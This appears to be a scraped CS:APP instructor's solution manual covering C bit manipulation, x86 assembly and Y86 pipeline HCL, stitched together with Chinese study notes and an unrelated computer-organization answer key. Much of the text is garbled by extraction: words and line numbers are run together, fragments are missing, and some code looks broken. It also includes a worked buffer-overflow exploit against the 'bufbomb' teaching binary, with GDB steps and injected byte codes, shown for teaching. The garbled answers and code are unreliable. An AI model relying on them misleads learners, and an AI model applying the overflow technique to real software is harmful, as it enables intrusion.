Problem 2.40 Solution: This exercise should be a straightforward variation on the existing code.

    void show_double(double x)
    {
        show_bytes((byte_pointer) &x, sizeof(double));
    }

code/data/show-ans.c

    int is_little_endian(void)
    {
        /* MSB = 0, LSB = 1 */
        int x = 1;

        /* Return MSB when big-endian, LSB when little-endian */
        return (int) (* (char *) &x);
    }

There are many solutions to this problem, but it is a little bit tricky to write one that works for any word size. Here is our solution:

code/data/shift-ans.c

The above code performs a right shift of a word in which all bits are set to 1. If the shift is arithmetic, the resulting word will still have all bits set to 1.

Problem 2.45 Solution: This problem illustrates some of the challenges of writing portable code. The fact that 1<<32 yields 0 on some 32-bit machines and 1 on others is a common source of bugs.

A. The C standard does not define the effect of a shift by 32 of a 32-bit datum. On the SPARC (and many other machines), the expression x<<k shifts by k mod 32, i.e., it ignores all but the least significant 5 bits of the shift amount. Thus, the expression 1<<32 yields 1.

B. Compute beyond_msb as 2<<31.

C. We cannot shift by more than 15 bits at a time, but we can compose multiple shifts to get the desired effect. Thus, we can compute set_msb as 2<<15<<15, and beyond_msb as set_msb<<1.

Problem 2.46 Solution: This problem highlights the difference between zero extension and sign extension. It also provides an excuse to show an interesting trick that compilers often use to use shifting to perform masking and sign extension.

A. The function does not perform any sign extension. For example, if we attempt to extract byte 0 from word 0xFF, we will get 255, rather than -1.

B. The following code uses a well-known trick for using shifts to isolate a particular range of bits and to perform sign extension at the same time. First, we perform a left shift so that the most significant bit of the desired byte is at bit position 31. Then we right shift by 24, moving the byte into the proper position and performing sign extension at the same time.

        int left = word << ((3-bytenum) << 3);
        return left >> 24;
    }

Problem 2.48 Solution: This problem lets students rework the proof that complement plus increment performs negation. We make use of the property that two's complement addition is associative, commutative, and has additive inverses. Using C notation, if we define y to be x-1, then we have ~y+1 equal to -y, and hence ~y equals -y-1. Substituting gives the expression -(x-1)-1, which equals -x.

Problem 2.49 Solution: This problem requires a fairly deep understanding of two's complement arithmetic. Some machines only provide one form of multiplication, and hence the trick shown in the code here is actually required to perform that actual form. As seen in Equation 2.16 we have x'*y' = x*y + (x(w-1)*y + y(w-1)*x)*2^w + x(w-1)*y(w-1)*2^(2w). The final term has no effect on the 2w-bit representation of x'*y', but the middle term represents a correction factor that must be added to the high order w bits. This is implemented as follows:

code/data/uhp-ans.c

Problem 2.50 Solution: Patterns of the kind shown here frequently appear in compiled code.

A. K = 5: x + (x<<2)
B. K = 9: x + (x<<3)
C. K = 14: (x<<4) - (x<<1)
D. K = -56: (x<<3) - (x<<6)

Problem 2.51 Solution: Bit patterns similar to these arise in many applications. Many programmers provide them directly in hexadecimal, but it would be better if they could express them in more abstract ways.

A. ~((1<<k)-1)
B. ((1<<k)-1)<<j

Problem 2.52 Solution: Byte extraction and insertion code is useful in many contexts. Being able to write this sort of code is an important skill to foster.

code/data/rbyte-ans.c

Problem 2.53 Solution: These problems are fairly tricky. They require generating masks based on the shift amounts. Shift value k equal to 0 must be handled as a special case, since otherwise we would be generating the mask by performing a left shift by 32.

    unsigned srl(unsigned x, int k)
    {
        /* Perform shift arithmetically */
        unsigned xsra = (int) x >> k;
        /* Make mask of low order 32-k bits */
        unsigned mask = k ? ((1 << (32-k)) - 1) : ~0;

        return xsra & mask;
    }

code/data/rshift-ans.c

    int sra(int x, int k)
    {
        /* Perform shift logically */
        int xsrl = (unsigned) x >> k;
        /* Make mask of high order k bits */
        unsigned mask = k ? ~((1 << (32-k)) - 1) : 0;

        return (x < 0) ? mask | xsrl : xsrl;
    }

B. (a) For , we have , ,

code/data/floatge-ans.c

    int float_ge(float x, float y)
    {
        unsigned ux = f2u(x);
        unsigned uy = f2u(y);
        unsigned sx = ux >> 31;
        unsigned sy = uy >> 31;

        return
            (ux<<1 == 0 && uy<<1 == 0) ||  /* Both are zero */
            (!sx && sy) ||                 /* x >= 0, y < 0 */
            (!sx && !sy && ux >= uy) ||    /* x >= 0, y >= 0 */
            (sx && sy && ux <= uy);        /* x < 0, y < 0 */
    }

This exercise is of practical value, since Intel-compatible processors perform all of their arithmetic in extended precision. It is interesting to see how adding a few more bits to the exponent greatly increases the range of values that can be represented.

Table (values lost in extraction): columns Description and Extended precision Value; rows Smallest denorm. and Largest norm.

Problem 2.59 Solution: We have found that working through floating point
representations for small word sizes is very instructive. Problems such as this one help make the description of IEEEﬂoating point more concrete.Description8000Smallest value4700Largest denormalized———code/data/fpwr2-ans.c1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS91/*Compute2**x*/2float fpwr2(int x){34unsigned exp,sig;5unsigned u;67if(x<-149){8/*Too small.Return0.0*/9exp=0;10sig=0;11}else if(x<-126){12/*Denormalized result*/13exp=0;14sig=1<<(x+149);15}else if(x<128){16/*Normalized result.*/17exp=x+127;18sig=0;19}else{20/*Too big.Return+oo*/21exp=255;22sig=0;23}24u=exp<<23|sig;25return u2f(u);26}10CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS int decode2(int x,int y,int z){int t1=y-z;int t2=x*t1;int t3=(t1<<31)>>31;int t4=t3ˆt2;return t4;}Problem3.32Solution:This code example demonstrates one of the pedagogical challenges of using a compiler to generate assembly code examples.Seemingly insigniﬁcant changes in the C code can yield very different results.Of course, students will have to contend with this property as work with machine-generated assembly code anyhow. 
They will need to be able to decipher many different code patterns.This problem encourages them to think in abstract terms about one such pattern.The following is an annotated version of the assembly code:1movl8(%ebp),%edx x2movl12(%ebp),%ecx y3movl%edx,%eax4subl%ecx,%eax result=x-y5cmpl%ecx,%edx Compare x:y6jge.L3if>=goto done:7movl%ecx,%eax8subl%edx,%eax result=y-x9.L3:done:A.When,it will computeﬁrst and then.When it just computes.B.The code for then-statement gets executed unconditionally.It then jumps over the code for else-statement if the test is false.C.then-statementt=test-expr;if(t)goto done;else-statementdone:D.The code in then-statement must not have any side effects,other than to set variables that are also setin else-statement.1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS11Problem3.33Solution:This problem requires students to reason about the code fragments that implement the different branches of a switch statement.For this code,it also requires understanding different forms of pointer dereferencing.A.In line29,register%edx is copied to register%eax as the return value.From this,we can infer that%edx holds result.B.The original C code for the function is as follows:1/*Enumerated type creates set of constants numbered0and upward*/2typedef enum{MODE_A,MODE_B,MODE_C,MODE_D,MODE_E}mode_t;34int switch3(int*p1,int*p2,mode_t action)5{6int result=0;7switch(action){8case MODE_A:9result=*p1;10*p1=*p2;11break;12case MODE_B:13*p2+=*p1;14result=*p2;15break;16case MODE_C:17*p2=15;18result=*p1;19break;20case MODE_D:21*p2=*p1;22/*Fall Through*/23case MODE_E:24result=17;25break;26default:27result=-1;28}29return result;30}Problem3.34Solution:This problem gives students practice analyzing disassembled code.The switch statement contains all the features one can imagine—cases with multiple labels,holes in the range of possible case values,and cases that fall through.12CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1int switch_prob(int x)2{3int 
result=x;45switch(x){6case50:7case52:8result<<=2;9break;10case53:11result>>=2;12break;13case54:14result*=3;15/*Fall through*/16case55:17result*=result;18/*Fall through*/19default:20result+=10;21}2223return result;24}code/asm/varprod-ans.c 1int var_prod_ele_opt(var_matrix A,var_matrix B,int i,int k,int n) 2{3int*Aptr=&A[i*n];4int*Bptr=&B[k];5int result=0;6int cnt=n;78if(n<=0)9return result;1011do{12result+=(*Aptr)*(*Bptr);13Aptr+=1;14Bptr+=n;15cnt--;1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS13 16}while(cnt);1718return result;19}code/asm/structprob-ans.c 1typedef struct{2int idx;3int x[4];4}a_struct;14CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1/*Read input line and write it back*/2/*Code will work for any buffer size.Bigger is more time-efficient*/ 3#define BUFSIZE644void good_echo()5{6char buf[BUFSIZE];7int i;8while(1){9if(!fgets(buf,BUFSIZE,stdin))10return;/*End of file or error*/11/*Print characters in buffer*/12for(i=0;buf[i]&&buf[i]!=’\n’;i++)13if(putchar(buf[i])==EOF)14return;/*Error*/15if(buf[i]==’\n’){16/*Reached terminating newline*/17putchar(’\n’);18return;19}20}21}An alternative implementation is to use getchar to read the characters one at a time.Problem3.38Solution:Successfully mounting a buffer overﬂow attack requires understanding many aspects of machine-level pro-grams.It is quite intriguing that by supplying a string to one function,we can alter the behavior of another function that should always return aﬁxed value.In assigning this problem,you should also give students a stern lecture about ethical computing practices and dispell any notion that hacking into systems is a desirable or even acceptable thing to do.Our solution starts by disassembling bufbomb,giving the following code for getbuf: 1080484f4<getbuf>:280484f4:55push%ebp380484f5:89e5mov%esp,%ebp480484f7:83ec18sub$0x18,%esp580484fa:83c4f4add$0xfffffff4,%esp680484fd:8d45f4lea0xfffffff4(%ebp),%eax78048500:50push%eax88048501:e86a ff ff ff 
call8048470<getxs>98048506:b801000000mov$0x1,%eax10804850b:89ec mov%ebp,%esp11804850d:5d pop%ebp12804850e:c3ret13804850f:90nopWe can see on line6that the address of buf is12bytes below the saved value of%ebp,which is4bytes below the return address.Our strategy then is to push a string that contains12bytes of code,the saved value1.3.CHAPTER3:MACHINE LEVEL REPRESENTATION OF C PROGRAMS15 of%ebp,and the address of the start of the buffer.To determine the relevant values,we run GDB as follows:1.First,we set a breakpoint in getbuf and run the program to that point:(gdb)break getbuf(gdb)runComparing the stopping point to the disassembly,we see that it has already set up the stack frame.2.We get the value of buf by computing a value relative to%ebp:(gdb)print/x(%ebp+12)This gives0xbfffefbc.3.Weﬁnd the saved value of register%ebp by dereferencing the current value of this register:(gdb)print/x*$ebpThis gives0xbfffefe8.4.Weﬁnd the value of the return pointer on the stack,at offset4relative to%ebp:(gdb)print/x*((int*)$ebp+1)This gives0x8048528We can now put this information together to generate assembly code for our attack:1pushl$0x8048528Put correct return pointer back on stack2movl$0xdeadbeef,%eax Alter return value3ret Re-execute return4.align4Round up to125.long0xbfffefe8Saved value of%ebp6.long0xbfffefbc Location of buf7.long0x00000000PaddingNote that we have used the.align statement to get the assembler to insert enough extra bytes to use up twelve bytes for the code.We added an extra4bytes of0s at the end,because in some cases OBJDUMP would not generate the complete byte pattern for the data.These extra bytes(plus the termininating null byte)will overﬂow into the stack frame for test,but they will not affect the program behavior. 
Assembling this code and disassembling the object code gives us the following:10:6828850408push$0x804852825:b8ef be ad de mov$0xdeadbeef,%eax3a:c3ret4b:90nop Byte inserted for alignment.5c:e8ef ff bf bc call0xbcc00000Invalid disassembly.611:ef out%eax,(%dx)Trying to diassemble712:ff(bad)data813:bf00000000mov$0x0,%edi16CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS From this we can read off the byte sequence:6828850408b8ef be ad de c390e8ef ff bf bc ef ff bf00000000Problem3.39Solution:This problem is a variant on the asm examples in the text.The code is actually fairly simple.It relies on the fact that asm outputs can be arbitrary lvalues,and hence we can use dest[0]and dest[1]directly in the output list.code/asm/asmprobs-ans.c Problem3.40Solution:For this example,students essentially have to write the entire function in assembly.There is no(apparent) way to interface between theﬂoating point registers and the C code using extended asm.code/asm/fscale.c1.4.CHAPTER4:PROCESSOR ARCHITECTURE17 1.4Chapter4:Processor ArchitectureProblem4.32Solution:This problem makes students carefully examine the tables showing the computation stages for the different instructions.The steps for iaddl are a hybrid of those for irmovl and OPl.StageFetchrA:rB M PCvalP PCExecuteR rB valEPC updateleaveicode:ifun M PCDecodevalB RvalE valBMemoryWrite backR valMPC valPProblem4.34Solution:The following HCL code includes implementations of both the iaddl instruction and the leave instruc-tions.The implementations are fairly straightforward given the computation steps listed in the solutions to problems4.32and4.33.You can test the solutions using the test code in the ptest subdirectory.Make sure you use command line argument‘-i.’18CHAPTER1.SOLUTIONS TO HOMEWORK PROBLEMS 1####################################################################2#HCL Description of Control for Single Cycle Y86Processor SEQ#3#Copyright(C)Randal E.Bryant,David 
R.O’Hallaron,2002#4####################################################################56##This is the solution for the iaddl and leave problems78####################################################################9#C Include’s.Don’t alter these#10#################################################################### 1112quote’#include<stdio.h>’13quote’#include"isa.h"’14quote’#include"sim.h"’15quote’int sim_main(int argc,char*argv[]);’16quote’int gen_pc(){return0;}’17quote’int main(int argc,char*argv[])’18quote’{plusmode=0;return sim_main(argc,argv);}’1920####################################################################21#Declarations.Do not change/remove/delete any of these#22#################################################################### 2324#####Symbolic representation of Y86Instruction Codes#############25intsig INOP’I_NOP’26intsig IHALT’I_HALT’27intsig IRRMOVL’I_RRMOVL’28intsig IIRMOVL’I_IRMOVL’29intsig IRMMOVL’I_RMMOVL’30intsig IMRMOVL’I_MRMOVL’31intsig IOPL’I_ALU’32intsig IJXX’I_JMP’33intsig ICALL’I_CALL’34intsig IRET’I_RET’35intsig IPUSHL’I_PUSHL’36intsig IPOPL’I_POPL’37#Instruction code for iaddl instruction38intsig IIADDL’I_IADDL’39#Instruction code for leave instruction40intsig ILEAVE’I_LEAVE’4142#####Symbolic representation of Y86Registers referenced explicitly##### 43intsig RESP’REG_ESP’#Stack Pointer44intsig REBP’REG_EBP’#Frame Pointer45intsig RNONE’REG_NONE’#Special value indicating"no register"4647#####ALU Functions referenced explicitly##### 48intsig ALUADD’A_ADD’#ALU should add its arguments4950#####Signals that can be referenced by control logic####################1.4.CHAPTER4:PROCESSOR ARCHITECTURE195152#####Fetch stage inputs#####53intsig pc’pc’#Program counter54#####Fetch stage computations#####55intsig icode’icode’#Instruction control code56intsig ifun’ifun’#Instruction function57intsig rA’ra’#rA field from instruction58intsig rB’rb’#rB field from instruction59intsig valC’valc’#Constant from instruction60intsig valP’valp’#Address of 
following instruction

##### Decode stage computations #####
intsig valA 'vala'                  # Value from register A port
intsig valB 'valb'                  # Value from register B port

##### Execute stage computations #####
intsig valE 'vale'                  # Value computed by ALU
boolsig Bch 'bcond'                 # Branch test

##### Memory stage computations #####
intsig valM 'valm'                  # Value read from memory


####################################################################
#    Control Signal Definitions.                                   #
####################################################################

################ Fetch Stage ###################################

# Does fetched instruction require a regid byte?
bool need_regids =
    icode in { IRRMOVL, IOPL, IPUSHL, IPOPL,
               IIADDL,
               IIRMOVL, IRMMOVL, IMRMOVL };

# Does fetched instruction require a constant word?
bool need_valC =
    icode in { IIRMOVL, IRMMOVL, IMRMOVL, IJXX, ICALL, IIADDL };

bool instr_valid = icode in
    { INOP, IHALT, IRRMOVL, IIRMOVL, IRMMOVL, IMRMOVL,
      IIADDL, ILEAVE,
      IOPL, IJXX, ICALL, IRET, IPUSHL, IPOPL };

################ Decode Stage ###################################

## What register should be used as the A source?
int srcA = [
    icode in { IRRMOVL, IRMMOVL, IOPL, IPUSHL } : rA;
    icode in { ILEAVE } : REBP;
    icode in { IPOPL, IRET } : RESP;
    1 : RNONE;  # Don't need register
];

## What register should be used as the B source?
int srcB = [
    icode in { IOPL, IRMMOVL, IMRMOVL } : rB;
    icode in { IIADDL } : rB;
    icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
    icode in { ILEAVE } : REBP;
    1 : RNONE;  # Don't need register
];

## What register should be used as the E destination?
int dstE = [
    icode in { IRRMOVL, IIRMOVL, IOPL } : rB;
    icode in { IIADDL } : rB;
    icode in { IPUSHL, IPOPL, ICALL, IRET } : RESP;
    icode in { ILEAVE } : RESP;
    1 : RNONE;  # Don't need register
];

## What register should be used as the M destination?
int dstM = [
    icode in { IMRMOVL, IPOPL } : rA;
    icode in { ILEAVE } : REBP;
    1 : RNONE;  # Don't need register
];

################ Execute Stage ###################################

## Select input A to ALU
int aluA = [
    icode in { IRRMOVL, IOPL } : valA;
    icode in { IIRMOVL, IRMMOVL, IMRMOVL } : valC;
    icode in { IIADDL } : valC;
    icode in { ICALL, IPUSHL } : -4;
    icode in { IRET, IPOPL } : 4;
    icode in { ILEAVE } : 4;
    # Other instructions don't need ALU
];

## Select input B to ALU
int aluB = [
    icode in { IRMMOVL, IMRMOVL, IOPL, ICALL,
               IPUSHL, IRET, IPOPL } : valB;
    icode in { IIADDL, ILEAVE } : valB;
    icode in { IRRMOVL, IIRMOVL } : 0;
    # Other instructions don't need ALU
];

## Set the ALU function
int alufun = [
    icode == IOPL : ifun;
    1 : ALUADD;
];

## Should the condition codes be updated?
bool set_cc = icode in { IOPL, IIADDL };

################ Memory Stage ###################################

## Set read control signal
bool mem_read = icode in { IMRMOVL, IPOPL, IRET, ILEAVE };

## Set write control signal
bool mem_write = icode in { IRMMOVL, IPUSHL, ICALL };

## Select memory address
int mem_addr = [
    icode in { IRMMOVL, IPUSHL, ICALL, IMRMOVL } : valE;
    icode in { IPOPL, IRET } : valA;
    icode in { ILEAVE } : valA;
    # Other instructions don't need address
];

## Select memory input data
int mem_data = [
    # Value from register
    icode in { IRMMOVL, IPUSHL } : valA;
    # Return PC
    icode == ICALL : valP;
    # Default: Don't write anything
];

################ Program Counter Update ############################

## What address should instruction be fetched at

int new_pc = [
    # Call.  Use instruction constant
    icode == ICALL : valC;
    # Taken branch.  Use instruction constant
    icode == IJXX && Bch : valC;
    # Completion of RET instruction.  Use value from stack
    icode == IRET : valM;
    # Default: Use incremented PC
    1 : valP;
];

[Figure 1.1: Pipeline states for special control conditions (mispredicted branch; generate/use hazards 1, 2 and 3). The pairs connected by arrows can arise simultaneously.]

code/arch/pipe-nobypass-ans.hcl

# Should I stall or inject a bubble into Pipeline Register F?
# At most one of these can be true.
bool F_bubble = 0;
bool F_stall =
    # Stall if either operand source is destination of
    # instruction in execute, memory, or write-back stages
    d_srcA != RNONE && d_srcA in
      { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
    d_srcB != RNONE && d_srcB in
      { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
    # Stalling at fetch while ret passes through pipeline
    IRET in { D_icode, E_icode, M_icode };

# Should I stall or inject a bubble into Pipeline Register D?
# At most one of these can be true.
bool D_stall =
    # Stall if either operand source is destination of
    # instruction in execute, memory, or write-back stages
    # but not part of mispredicted branch
    !(E_icode == IJXX && !e_Bch) &&
    (d_srcA != RNONE && d_srcA in
      { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
     d_srcB != RNONE && d_srcB in
      { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE });

bool D_bubble =
    # Mispredicted branch
    (E_icode == IJXX && !e_Bch) ||
    # Stalling at fetch while ret passes through pipeline
    !(E_icode in { IMRMOVL, IPOPL } && E_dstM in { d_srcA, d_srcB }) &&
    # but not condition for a generate/use hazard
    !(d_srcA != RNONE && d_srcA in
       { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
      d_srcB != RNONE && d_srcB in
       { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE }) &&
    IRET in { D_icode, E_icode, M_icode };

# Should I stall or inject a bubble into Pipeline Register E?
# At most one of these can be true.
bool E_stall = 0;
bool E_bubble =
    # Mispredicted branch
    (E_icode == IJXX && !e_Bch) ||
    # Inject bubble if either operand source is destination of
    # instruction in execute, memory, or write back stages
    d_srcA != RNONE &&
      d_srcA in { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE } ||
    d_srcB != RNONE &&
      d_srcB in { E_dstM, E_dstE, M_dstM, M_dstE, W_dstM, W_dstE };

# Should I stall or inject a bubble into Pipeline Register M?
# At most one of these can be true.
bool M_stall = 0;
bool M_bubble = 0;

code/arch/pipe-full-ans.hcl

####################################################################
#    HCL Description of Control for Pipelined Y86 Processor        #
#    Copyright (C) Randal E. Bryant, David R. O'Hallaron, 2002     #
####################################################################

## This is the solution for the iaddl and leave problems

####################################################################
#    C Include's.  Don't alter these                               #
####################################################################

quote '#include <stdio.h>'
quote '#include "isa.h"'
quote '#include "pipeline.h"'
quote '#include "stages.h"'
quote '#include "sim.h"'
quote 'int sim_main(int argc, char *argv[]);'
quote 'int main(int argc, char *argv[]){return sim_main(argc,argv);}'

####################################################################
#    Declarations.  Do not change/remove/delete any of these       #
####################################################################

##### Symbolic representation of Y86 Instruction Codes #############
intsig INOP     'I_NOP'
intsig IHALT    'I_HALT'
intsig IRRMOVL  'I_RRMOVL'
intsig IIRMOVL  'I_IRMOVL'
intsig IRMMOVL  'I_RMMOVL'
intsig IMRMOVL  'I_MRMOVL'
intsig IOPL     'I_ALU'
intsig IJXX     'I_JMP'
intsig ICALL    'I_CALL'
intsig IRET     'I_RET'
intsig IPUSHL   'I_PUSHL'
intsig IPOPL    'I_POPL'
# Instruction code for iaddl instruction
intsig IIADDL   'I_IADDL'
# Instruction code for leave instruction
intsig ILEAVE   'I_LEAVE'

##### Symbolic representation of Y86 Registers referenced explicitly #####
intsig RESP     'REG_ESP'           # Stack Pointer
intsig REBP     'REG_EBP'           # Frame Pointer
intsig RNONE    'REG_NONE'          # Special value indicating "no register"

##### ALU Functions referenced explicitly ##########################
intsig ALUADD   'A_ADD'             # ALU should add its arguments

##### Signals that can be referenced by control logic ##############

##### Pipeline Register F ##########################################

intsig F_predPC 'pc_curr->pc'       # Predicted value of PC

##### Intermediate Values in Fetch Stage ###########################

intsig f_icode  'if_id_next->icode' # Fetched instruction code
intsig f_ifun   'if_id_next->ifun'  # Fetched instruction function
intsig f_valC   'if_id_next->valc'  # Constant data of fetched instruction
intsig f_valP   'if_id_next->valp'  # Address of following instruction

##### Pipeline Register D ##########################################
intsig D_icode  'if_id_curr->icode' # Instruction code
intsig D_rA     'if_id_curr->ra'    # rA field from instruction
intsig D_rB     'if_id_curr->rb'    # rB field from instruction
intsig D_valP   'if_id_curr->valp'  # Incremented PC

##### Intermediate Values in Decode Stage #########################

intsig d_srcA   'id_ex_next->srca'  # srcA from decoded instruction
intsig d_srcB   'id_ex_next->srcb'  # srcB from decoded instruction
intsig d_rvalA  'd_regvala'         # valA read from register file
intsig d_rvalB  'd_regvalb'         # valB read from register file

##### Pipeline Register E ##########################################
intsig E_icode  'id_ex_curr->icode' # Instruction code
intsig E_ifun   'id_ex_curr->ifun'  # Instruction function
intsig E_valC   'id_ex_curr->valc'  # Constant data
intsig E_srcA   'id_ex_curr->srca'  # Source A register ID
intsig E_valA   'id_ex_curr->vala'  # Source A value
intsig E_srcB   'id_ex_curr->srcb'  # Source B register ID
intsig E_valB   'id_ex_curr->valb'  # Source B value
intsig E_dstE   'id_ex_curr->deste' # Destination E register ID

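Answers to Computer Systems: A Programmer's Perspective

[Part 1: Notes on Computer Systems: A Programmer's Perspective]

(1) For an unsigned number x, truncating it to k bits is equivalent to computing x mod 2^k.

(2) On most machines the integer multiply instruction is fairly slow, requiring 12 or more clock cycles, whereas other integer operations (addition, subtraction, bit-level operations, and shifts) need only 1 clock cycle. An important compiler optimization is therefore to replace multiplication by a constant factor with a combination of shifts and additions.

(3) On most machines integer division is even slower than integer multiplication, requiring 30 or more clock cycles. Division by a power of 2 can also be done with a shift, but with a right shift rather than a left shift. Unsigned and two's-complement numbers use logical and arithmetic shifts, respectively.

1. Note the classification of systems: the mainstream IA32 (that is, x86) and x86-64 (that is, x64), plus Intel's IA64, which is incompatible with the original 32-bit systems.

2. The compilation system consists of the preprocessor, the compiler, the assembler, and the linker.

3. Single-instruction, multiple-data parallelism is called SIMD parallelism; the SSE instruction set is an extension that provides it.

4. On x64, long is 8 bytes and a pointer is also 8 bytes (this holds for the LP64 model used on Linux).

5. A right shift of an unsigned number must be a logical shift, whereas signed numbers generally use an arithmetic right shift.

6. When a signed value meets an unsigned value in an expression, it is implicitly converted to unsigned.

7. When a short is converted to unsigned, the size is extended first and the signedness is converted afterwards.

8. Computing the two's-complement negation: complement every bit to the left of the rightmost 1 bit.

9. Right-shifting a negative two's-complement number rounds down (toward negative infinity).

10. Positive floating-point numbers can be sorted with an integer sorting routine.

11. Floating-point addition and multiplication are not associative, and floating-point multiplication does not distribute over addition.

12. The preprocessor expands the source code; the compiler then produces assembly code in text form; the assembler converts it into binary machine code; and the linker produces an exe, dll, or lib.

13. A register can hold either an address or a value.

Note that parentheses in assembly mean "the value at that address": (%eax) denotes the value at the address stored in %eax.

14. The two operands of a move instruction cannot both refer to memory.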
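Several of the integer notes above, (1) to (3) and items 8 and 9, can be checked with a few small C functions. This is only a sketch under stated assumptions: the function names are hypothetical, the word size is fixed at 32 bits, and the constant 14 is an arbitrary example of a multiplier.

```c
#include <assert.h>
#include <stdint.h>

/* Truncate an unsigned value to its low k bits (0 < k < 32).
   The result equals x mod 2^k. */
uint32_t truncate_bits(uint32_t x, unsigned k)
{
    assert(k > 0 && k < 32);
    return x & ((UINT32_C(1) << k) - 1);
}

/* Multiply by the constant 14 with shifts and one subtraction:
   14x = 16x - 2x. */
uint32_t times14(uint32_t x)
{
    return (x << 4) - (x << 1);
}

/* Two's-complement negation as "complement, then add 1". Done on
   unsigned values so that wraparound is well defined in C. */
uint32_t negate_bits(uint32_t x)
{
    return ~x + 1u;
}

/* Floor division by 2^k: the value an arithmetic right shift yields,
   including for negative x. Written without >> on a negative int,
   whose result C leaves implementation-defined. */
int32_t floor_div_pow2(int32_t x, unsigned k)
{
    assert(k < 31);
    int32_t d = (int32_t)1 << k;
    int32_t q = x / d;              /* C division truncates toward zero */
    if (x % d != 0 && x < 0)
        q -= 1;                     /* adjust toward negative infinity */
    return q;
}
```

For instance, floor_div_pow2(-5, 1) yields -3 where plain C division -5 / 2 yields -2, which is the rounding difference item 9 refers to.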

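Principles of Computer Organization (2nd Edition): End-of-Chapter Answers, Chapter 7

14. Suppose a relative-addressing jump instruction occupies two bytes: the first byte is the opcode and the second byte is the relative displacement, expressed in two's complement. Assume the first byte of the current jump instruction is at address 2000H and that the CPU automatically performs (PC) + 1 → PC each time it fetches a byte. What is the content of the second byte of the jump instruction when executing "JMP *+8" and "JMP *-9"?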
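The displacement asked for in problem 14 can be worked out mechanically. The sketch below assumes that "*" denotes the address of the instruction's first byte (2000H here) and that the PC has already advanced past both bytes when the displacement is added; the function name is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* Displacement byte for a two-byte relative jump.
   instr_addr: address of the opcode byte; target: destination address.
   The PC equals instr_addr + 2 once both bytes have been fetched, so
   displacement = target - (instr_addr + 2). */
uint8_t rel_jump_disp(uint16_t instr_addr, uint16_t target)
{
    int32_t disp = (int32_t)target - ((int32_t)instr_addr + 2);
    assert(disp >= -128 && disp <= 127);  /* must fit in one signed byte */
    return (uint8_t)disp;                 /* two's-complement encoding */
}
```

Under these assumptions, "JMP *+8" targets 2008H and gives 2008H - 2002H = 06H, while "JMP *-9" targets 1FF7H and gives 1FF7H - 2002H = -0BH, which is F5H in two's complement.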
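11. Draw schematic diagrams of the addressing process for index-then-indirect addressing and for indirect-then-index addressing.
Solution: 1) The index-then-indirect addressing process is sketched as follows: EA = [(IX) + A], (IX) + 1 → IX
[Figure: instruction register IR (fields OP, M, A), index register IX with a +1 incrementer, the ALU, and main memory holding the operand]
IX: the index register, which may be a dedicated register or one of the general-purpose registers.
Assume single-level indirection.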
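(6) Of the six addressing modes, immediate addressing gives the shortest instruction execution time, because no address has to be resolved;
indirect addressing gives the longest, because resolving the address takes one or more memory accesses;
relative addressing makes programs easy to relocate, because the operand location moves together with the program's storage area and always stays at a fixed distance from the program;
indexed addressing is best suited to array processing, because the index value can be modified automatically without changing the program.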
EA = (PR) ‖ A (effective address = page address "concatenated" with the 6-bit formal address)
This yields a 22-bit effective address.
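The concatenation EA = (PR) ‖ A amounts to a shift and an OR. In this sketch the 16-bit width of the page register is an inference (22 bits minus the 6-bit formal address), and the function name is hypothetical.

```c
#include <assert.h>
#include <stdint.h>

/* EA = (PR) || A: the page register supplies the high-order bits and
   the 6-bit formal address supplies the low-order bits. */
uint32_t page_concat_ea(uint16_t page, uint8_t a)
{
    assert(a < 64);                       /* A must fit in 6 bits */
    return ((uint32_t)page << 6) | a;     /* 16 + 6 = 22 address bits */
}
```

With every bit set, page_concat_ea(0xFFFF, 0x3F) gives 0x3FFFFF, the largest 22-bit address.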
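Differences between obtaining the actual address through base addressing and through segment addressing:
1) In base addressing, the base address is generally long (as wide as a memory address) and the displacement is short (as wide as the formal address field); the effective address obtained by adding them is as long as the base address. In this case main memory is not segmented.
EA1 = (PC) + 8 = 2002H + 0008H = 200AH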

Answers to Computer Systems: A Programmer's Perspective (ultra-high-definition electronic edition)

Computer Systems: A Programmer's Perspective
Instructor's Solution Manual
Randal E. Bryant
David R. O'Hallaron
December 4, 2003

Chapter 1 Solutions to Homework Problems

The text uses two different kinds of exercises:

Practice Problems. These are problems that are incorporated directly into the text, with explanatory solutions at the end of each chapter. Our intention is that students will work on these problems as they read the book. Each one highlights some particular concept.

Homework Problems. These are found at the end of each chapter. They vary in complexity from simple drills to multi-week labs and are designed for instructors to give as assignments or to use as recitation examples.

This document gives the solutions to the homework problems.

1.1 Chapter 1: A Tour of Computer Systems

1.2 Chapter 2: Representing and Manipulating Information

Problem 2.40 Solution:
This exercise should be a straightforward variation on the existing code.

    [...]
    void show_double(double x)
    {
        show_bytes((byte_pointer) &x, sizeof(double));
    }

code/data/show-ans.c

    int is_little_endian(void)
    {
        /* MSB = 0, LSB = 1 */
        int x = 1;

        /* Return MSB when big-endian, LSB when little-endian */
        return (int) (*(char *) &x);
    }

There are many solutions to this problem, but it is a little bit tricky to write one that works for any word size. Here is our solution:

code/data/shift-ans.c

The above code performs a right shift of a word in which all bits are set to 1. If the shift is arithmetic, the resulting word will still have all bits set to 1.

Problem 2.45 Solution:
This problem illustrates some of the challenges of writing portable code. The fact that 1<<32 yields 0 on some 32-bit machines and 1 on others is a common source of bugs.

A. The C standard does not define the effect of a shift by 32 of a 32-bit datum. On the SPARC (and many other machines), the expression x << [...]
B. Compute beyond_msb as 2<<31.
C. We cannot shift by more than 15 bits at a time, but we can compose multiple shifts to get the desired effect. Thus, we can compute set_msb as 2<<15<<15, and beyond_msb as set_msb<<1.

Problem 2.46 Solution:
